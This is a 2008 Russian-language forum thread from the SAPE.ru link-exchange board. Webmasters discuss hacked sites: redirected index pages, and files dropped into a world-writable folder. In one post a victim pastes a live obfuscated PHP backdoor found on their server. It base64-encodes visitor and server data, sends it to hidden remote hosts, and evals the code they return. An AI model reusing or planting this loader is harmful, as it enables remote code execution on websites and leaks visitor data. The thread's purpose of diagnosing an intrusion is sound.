Вернуться   Форум SAPE.RU > Система SAPE.ru > Вопросы по работе системы

-->
Ответ
 
Опции темы
Старый 18.08.2008, 12:33   #31
Специалист
 
Аватар для Inkwisitor
 
Регистрация: 31.01.2008
Сообщений: 218
Вес репутации: 203
Inkwisitor скоро станет известенInkwisitor скоро станет известен
Post

Цитата:
Сообщение от Kiparis Посмотреть сообщение
Информация к размышлению...
сегодня обнаружил в папке с кодом сапы два файла .htaccess и 134123.php в .htaccess на него ссылка по 404, а в файле какой-то код, по типу вирусного...
У меня было другое. Содержание всех файлов index.php для сайтов исчезло, а вместо него появилась редиректная javascript ссылка, которая неработала. Все остальное осталось нетронуто.

PS. Google этого юмора не оценил и вмиг убрал сайты из поисковой выдачи, и начал всех оповещать что существует возможность заразиться вирусом при посещении сайта. Яндекс даже не заметил
Inkwisitor вне форума   Ответить с цитированием
Старый 18.08.2008, 12:46   #32
Специалист
 
Аватар для Kiparis
 
Регистрация: 05.12.2007
Адрес: Crimea
Сообщений: 234
Вес репутации: 205
Kiparis скоро станет известенKiparis скоро станет известен
Отправить сообщение для Kiparis с помощью ICQ
По умолчанию

Цитата:
Сообщение от Inkwisitor Посмотреть сообщение
У меня было другое. Содержание всех файлов index.php для сайтов исчезло, а вместо него появилась редиректная javascript ссылка, которая неработала. Все остальное осталось нетронуто.
это говорит об угоне пароля от фтп, бо корневой каталог должен быть закрыт для редактирования извне, другое дело папка сапы, она открыта полностью (777) !!!
__________________
Praemonitus, praemunitus.
"Кто предупрежден - тот вооружен."
Kiparis вне форума   Ответить с цитированием
Старый 18.08.2008, 12:49   #33
Специалист
 
Аватар для MadGreen
 
Регистрация: 29.09.2007
Сообщений: 403
Вес репутации: 216
MadGreen - просто великолепная личностьMadGreen - просто великолепная личностьMadGreen - просто великолепная личностьMadGreen - просто великолепная личностьMadGreen - просто великолепная личностьMadGreen - просто великолепная личность
По умолчанию

открыта для чего? в любом случае в 777 можно писать либо из скрипта на хостинге либо на фтп - ищите дырку в движке (хотя скорее всего просто фтп)
MadGreen вне форума   Ответить с цитированием
Старый 18.08.2008, 13:08   #34
Эксперт
 
Регистрация: 12.03.2008
Адрес: будете смеяться, но я-таки нерезидент
Сообщений: 2,663
Вес репутации: 296
sergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Kiparis Посмотреть сообщение
Информация к размышлению...
сегодня обнаружил в папке с кодом сапы два файла .htaccess и 134123.php в .htaccess на него ссылка по 404, а в файле какой-то код, по типу вирусного...
А чего размышлять? Либо дырка в движке, либо вирус на машине хостера (к примеру на одном из соседних сайтов).
__________________
Подыскиваю умных реферралов.
sergbond вне форума   Ответить с цитированием
Старый 18.08.2008, 13:11   #35
Специалист
 
Аватар для Kiparis
 
Регистрация: 05.12.2007
Адрес: Crimea
Сообщений: 234
Вес репутации: 205
Kiparis скоро станет известенKiparis скоро станет известен
Отправить сообщение для Kiparis с помощью ICQ
По умолчанию

Цитата:
Сообщение от sergbond Посмотреть сообщение
А чего размышлять? Либо дырка в движке, либо вирус на машине хостера (к примеру на одном из соседних сайтов).
я к тому, что это проявилось только в папке сапы, хоть она была у меня переименована и sape.php тоже переименован...

p.s. Движка как такового нет, сайт самописный на пхп.
__________________
Praemonitus, praemunitus.
"Кто предупрежден - тот вооружен."
Kiparis вне форума   Ответить с цитированием
Старый 18.08.2008, 13:17   #36
Эксперт
 
Регистрация: 12.03.2008
Адрес: будете смеяться, но я-таки нерезидент
Сообщений: 2,663
Вес репутации: 296
sergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Kiparis Посмотреть сообщение
я к тому, что это проявилось только в папке сапы, хоть она была у меня переименована и sape.php тоже переименован...

p.s. Движка как такового нет, сайт самописный на пхп.
Если код пихают в корень или дописывают им существующие файлы - значит ушел налево пароль фтп (трояны/вирусы на машине пользователя)

Если код пихают в папки 777 - значит пишут через апач на ваших скриптах (чаще всего), либо скриптами с соседних аккаунтов.

Самописный сайт на пхп принимает какие-нибудь параметры через GET/POST?
__________________
Подыскиваю умных реферралов.
sergbond вне форума   Ответить с цитированием
Старый 18.08.2008, 13:32   #37
Сам себе раб
 
Аватар для NCom
 
Регистрация: 09.10.2007
Адрес: Геленджик
Сообщений: 2,493
Вес репутации: 321
NCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущееNCom - прекрасное будущее
По умолчанию

многим бы помогла привязка по ip... вот я бы работал и не боялся. Было бы еще удобно, если бы можно указать 2 ip к примеру. К примеру задаешь ip и подтверждаешь его по смс с указанного телефона, по типу вебманей.
__________________
Последний год нравится в этой тизерке, а сервер арендую здесь и не жалуюсь.
NCom вне форума   Ответить с цитированием
Старый 18.08.2008, 13:57   #38
Специалист
 
Аватар для Kiparis
 
Регистрация: 05.12.2007
Адрес: Crimea
Сообщений: 234
Вес репутации: 205
Kiparis скоро станет известенKiparis скоро станет известен
Отправить сообщение для Kiparis с помощью ICQ
По умолчанию

Цитата:
Сообщение от sergbond Посмотреть сообщение
Если код пихают в корень или дописывают им существующие файлы - значит ушел налево пароль фтп (трояны/вирусы на машине пользователя)

Если код пихают в папки 777 - значит пишут через апач на ваших скриптах (чаще всего), либо скриптами с соседних аккаунтов.

Самописный сайт на пхп принимает какие-нибудь параметры через GET/POST?
пихают только в папку с 777, есть страничка обратной связи, там можно оставить сообщение, но оно модерируется и не выводится без одобрения...


вот что в коде

PHP код:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j);if((include(base64_decode("aHR0cDovLw==").base64_decode("YS5waHB0YWdzLndz")."/?".$str)));else if(include(base64_decode("aHR0cDovLw==").base64_decode("Yi5waHB0YWdzLndz")."/?".$str));else if($c=file_get_contents(base64_decode("aHR0cDovLzcucGhwdGFncy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLnBocHRhZ3Mud3MvPw==").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>
Добавлено через 17 минут
а лишние параметры в GET/POST режутся!
__________________
Praemonitus, praemunitus.
"Кто предупрежден - тот вооружен."

Последний раз редактировалось Kiparis; 18.08.2008 в 13:57. Причина: Добавлено сообщение
Kiparis вне форума   Ответить с цитированием
Старый 18.08.2008, 14:40   #39
Эксперт
 
Регистрация: 12.03.2008
Адрес: будете смеяться, но я-таки нерезидент
Сообщений: 2,663
Вес репутации: 296
sergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущееsergbond - прекрасное будущее
По умолчанию

Цитата:
Сообщение от Kiparis Посмотреть сообщение
пихают только в папку с 777, есть страничка обратной связи, там можно оставить сообщение, но оно модерируется и не выводится без одобрения...
а лишние параметры в GET/POST режутся!
Этого достаточно, чтобы напихать по самое "н е б а л у й", если код дырявый.
Пихать будут НЕ через лишние параметры.
__________________
Подыскиваю умных реферралов.
sergbond вне форума   Ответить с цитированием
Старый 18.08.2008, 15:12   #40
Специалист
 
Аватар для Kiparis
 
Регистрация: 05.12.2007
Адрес: Crimea
Сообщений: 234
Вес репутации: 205
Kiparis скоро станет известенKiparis скоро станет известен
Отправить сообщение для Kiparis с помощью ICQ
По умолчанию

Цитата:
Сообщение от sergbond Посмотреть сообщение
Этого достаточно, чтобы напихать по самое "н е б а л у й", если код дырявый.
можно поподробнее про дырявый код?
__________________
Praemonitus, praemunitus.
"Кто предупрежден - тот вооружен."
Kiparis вне форума   Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взломали аккаунт anshir Ошибки при работе с системой 3 02.07.2008 14:00
взломали говносайт! Ё-маЁЁЁЁ Администрация 6-ой палаты Курилка 49 26.04.2008 11:31
Перевод средств в сапе аккаунт -> аккаунт rebronin Вопросы от новичков 12 04.04.2008 14:49
Взломали мой акк! Как восстановить? minimum Вопросы по работе системы 1 06.02.2008 21:27
Сапу взломали? loure Вопросы по работе системы 12 05.11.2007 14:20


Часовой пояс GMT +3, время: 00:56.